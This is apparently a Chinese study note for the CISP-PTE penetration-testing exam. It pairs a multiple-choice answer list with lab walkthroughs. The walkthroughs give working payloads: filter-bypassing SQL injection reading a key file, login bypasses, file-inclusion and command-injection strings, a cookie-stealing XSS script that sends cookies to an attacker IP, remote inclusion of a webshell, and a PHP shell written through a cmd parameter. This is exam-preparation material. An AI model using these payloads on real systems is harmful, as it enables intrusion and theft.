CISP-PTE 学习笔记

选择题部分

题目描述 答案
【单选】以下数据库只能通过字典枚举数据表的是 mysql < 5.0
【单选】XXE漏洞可以做什么 读取服务器文件
【单选】以下关于VPN说法正确的是: VPN指的是用户通过公用网络建立的临时的、安全的连接
【单选】TCP会话劫持出了SYN Flood攻击,还需要 序列号预测
【单选】语义攻击利用的是 信息内容的含义
【单选】CSRF攻击不能做什么 盗取用户凭证
【单选】以下命令可以用来获取DNS记录的是 dig
【单选】Windows操作系统中可显示或修改任意访问控制列表的命令是 cacls
【单选】之前版本的中间件未出现过解析漏洞的是 tomcat
【单选】以下哪个数据库不是关系型数据库 redis
【单选】Mysql数据库若使用load_file()函数读取操作系统文件时需要的权限是 File
【单选】以下关于cc攻击说法错误的是 cc攻击利用的时tcp协议的缺陷
【单选】在Google Hacking语法中,下面哪一个是搜索指定类型的文件 filetype
【单选】SQLSERVER数据库身份验证支持的模式错误是 radius身份验证模式
【单选】如何防护存储型XSS漏洞? 对html标签进行转义处理
【单选】拿到一个windows下的webshell,我想看一下主机的名字,如下命令做不到的是 set
【单选】攻击者截获并记录了从A到B的数据,然后又从早些时候所截获的数据中提取出信息,重放发往B称为 回放攻击
【单选】张三将微信个人头像换成微信群中某好友头像,并将昵称改为该好友的昵称,然后向该好友的其他好友发送一些欺骗消息。该攻击行为属于以下哪类攻击? 社会工程学攻击
【单选】以下哪个工具不可以抓取HTTP数据包? Nmap
【单选】第一次出现”HACKER”这个词是在 麻省理工AI实验室
【单选】小明从服务器access日志中发现一条可疑攻击日志: 208.34.12.3 - - [08/Dec/2016:07:30:17 +0000] “GET /profile/i.php?header=../imgs/1845.jpg HTTP/1.1” 200 797 “http://www.xiaoming.com/" “Mozilla/5.0……” 请指出小明遭受到了何种类型的攻击 文件包含
【单选】与WannaCry漏洞传播相关的端口号是 445
【单选】下面属于企业无线安全加密认证的方法是 PEAP-MSV2
【单选】根据等级保护相关管理文件,信息系统的安全保护等级分为几个级别 5
【单选】黑客攻入内网后,ARP欺骗是黑客使用最为频繁的攻击方式,请问ARP欺骗可能对局域网用户产生什么威胁。 挂马、DNS投毒、中间人攻击
【单选】以下哪个工具不是用于二进制静态分析的? AFL
【单选】一般情况下,在Android系统中,可以通过以下那个文件内容,来判断当前进程是否处于调试状态 /proc/self/status
【单选】下面属于保护wifi安全的配置方法正确的是 隐藏SSID
【单选】以下哪些属于 UAF ( use-after-free )漏洞 内存地址对象破坏性调用的漏洞
【单选】使用IDA反编译arm版elf文件时,如何在arm和thumb两种反汇编模式之间进行切换 修改寄存器T值
【单选】请问使用哪条指令,可使得文件权限如下: -rwxr-sr-x 1 ctf ctf 1K Dec 20 2017 binary chmod 2755 binary
【单选】以下不可以访问其他进程内存方式的是 向目标进程发送窗口消息
【单选】内存完整性校验不可以检查到下列哪些操作 内存断点
【单选】关于AMD64汇编call指令描述正确的是 下一条指令地址压入栈,栈地址减8
【单选】以下哪些不属于漏洞利用缓解的范围 ROP
【单选】Krack无线漏洞是一种什么攻击 高级中间人攻击
【单选】下面属于加密的协议是? SSL
【单选】在 ARM 中返回值是通过哪一寄存器来传递的? R0
【单选】哪些编程语言需要手动进行内存回收? C/C++
【单选】中华人民共和国网络安全法于何时开始实施 2017年6月1日
【单选】DNS服务器根据查询方式有多种,以下哪种方式可以通过IP地址查找域名? 反向查询
【单选】渗透性测试的第一步是 信息收集
【单选】下面Linux权限对应错误的是? -rw-r–r– 622
【单选】在Linux下umask的八进制模式位6代表? 读取和写入
【单选】没权限访问某个页面,服务器会返回哪个状态码 403
【单选】对目标网络进行扫描时发现,某一个主机开放了25和110端口,此主机最有可能是什么? 邮件服务器
【单选】NMAP使用SYN扫描的参数为? nmap -sS
【单选】在使用sqlmap进行sql注入时,我们会使用什么参数来爆所有的数据库名? dbs
【单选】在用户使用Telnet或FTP连接到远程主机上时,在因特网上传输的口令是没有加密的,那么入侵系统的一个方法就是通过监视携带用户名和口令的 ()获取用户信息。 IP包
【单选】关于IIS短文件名漏洞描述错误的是() 对象转换成字节流,便于保存在内存中
【单选】拒绝服务不包括以下哪一项? ARP攻击
【单选】下列不属于 WEB 安全性测试的范畴的是? 数据库内容安全性
【单选】下面对RSA和ECC描述不正确的是? 同等安全长度下,ECC秘密钥长度要比RSA密钥长度更长
【单选】在NT中,如果config.pol已经禁止了对注册表的访问,那么黑客能够绕过这个限制吗?怎样实现? 可以通过时间服务来启动注册表编辑器
【单选】在Linux的shell中,command1|command2的意思为? 只执行command2不执行command1
【单选】在MySQL中,下列哪个函数可以读取文件内容? load_file()
【单选】下面对Cookie和Session描述不正确的是? 对于用户验证场合,Cookie比Session更加安全
【单选】在HTTP 1.1中下列哪种请求方法未被定义? PUSH
【单选】Linux中,什么命令可以控制口令的存活时间? chage

实操题

SQL注入练习题目1

注释替换空格,双写union绕过,load_file 读

1
fu1.php?id=-1')/**/ununionion/**/select/**/1,load_file('/tmp/360/key'),3,4%23

SQL注入练习题目2

不用引号闭合 其余同上

1
fu1.php?id=-1)/**/ununionion/**/select/**/1,load_file("/tmp/360/key"),3,4%23

SQL 注入练习题目3

比上面多个百分号,字段数好像也不一样

1
fu1.php?id=-1%') ununionion select 1,load_file("/tmp/360/key"),3,4,5,6,7--+

SQL注入练习题目5

万能密码,过滤了两次or,三次过

1
2
Username: admin
Password: 1' ooorrr '1'='1

SQL注入练习题目6

多了一个注册功能,注册一个超过字段长的用户名admin 1

用户登陆的时候可以绕过原本admin密码

SQL注入练习题目8

万能密码登录admin"#

SQL注入练习题目2021

%00 截断后面的引号….

文件上传练习题目1

修改Content-Type,不行的话再加个图片头 gif? GIF89a?

文件上传练习题目5/2021

内容检测,system绕

文件上传练习题目8

同上 然后爆破地址

文件包含练习题目1

1
file=php://filter/convert.base64-encode/resource=../key.php

文件包含练习题目5

在view.html有后门,包含执行

文件包含练习题目8/2021

远程文件包含,1.txt是一句话木马,自动加.txt后缀,连蚁剑?page=http://49.235.78.245:88/1

命令执行练习题目1

1
;base64 <../key.php

命令执行练习题目2

1
;base64 <../key.php

命令执行练习题目8

反斜线能过黑名单,l\s,ca\t 等等

日志分析练习题目1

dirsearch扫描目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[17:05:35] 301 -  329B  - /css  ->  http://13a9302f.yunyansec.com/css/
[17:05:37] 200 - 756B - /fckeditor/
[17:05:37] 301 - 335B - /fckeditor -> http://13a9302f.yunyansec.com/fckeditor/
[17:05:38] 301 - 331B - /fonts -> http://13a9302f.yunyansec.com/fonts/
[17:05:40] 200 - 750B - /images/
[17:05:40] 301 - 332B - /images -> http://13a9302f.yunyansec.com/images/
[17:05:40] 200 - 928B - /index.php/login/
[17:05:40] 200 - 928B - /index.php
[17:05:41] 200 - 1KB - /js/
[17:05:42] 200 - 2KB - /manage.php
[17:05:49] 403 - 302B - /server-status
[17:05:49] 403 - 303B - /server-status/
[17:05:52] 200 - 0B - /upload.php
[17:05:52] 200 - 752B - /uploads/
[17:05:52] 301 - 333B - /uploads -> http://13a9302f.yunyansec.com/uploads/
[17:05:56] 200 - 28MB - /access.log

看到有个manage.php,打开是个登陆页

burpsuite抓包爆破

日志分析练习题目2

筛选出响应码200的,有个/admin/goodluck.php

日志分析练习题目3

同上admin/backdoor.php

XSS 练习题目5

1
2
3
4
<script>
var img = document.createElement("img");
img.src="https://操作机ip:1234/a?"+escape(document.cookie);
</script>

暴力破解练习题目5

burp 爆破

反序列化练习题目2021

1
2
3
4
5
<?php 
$TEMP = "Whatever is worth doing is worth doing well.";
echo serialize($TEMP);
?>
# /index.php?str=s:44:"Whatever%20is%20worth%20doing%20is%20worth%20doing%20well."

访问控制练习题目2021

修改xff头和cookie

代码审计题目6

1
vul.php?cmd=echo%20%27<?=`ls`;%27%20>%201.php

四个靶场渗透由于没有vpn 暂时不做了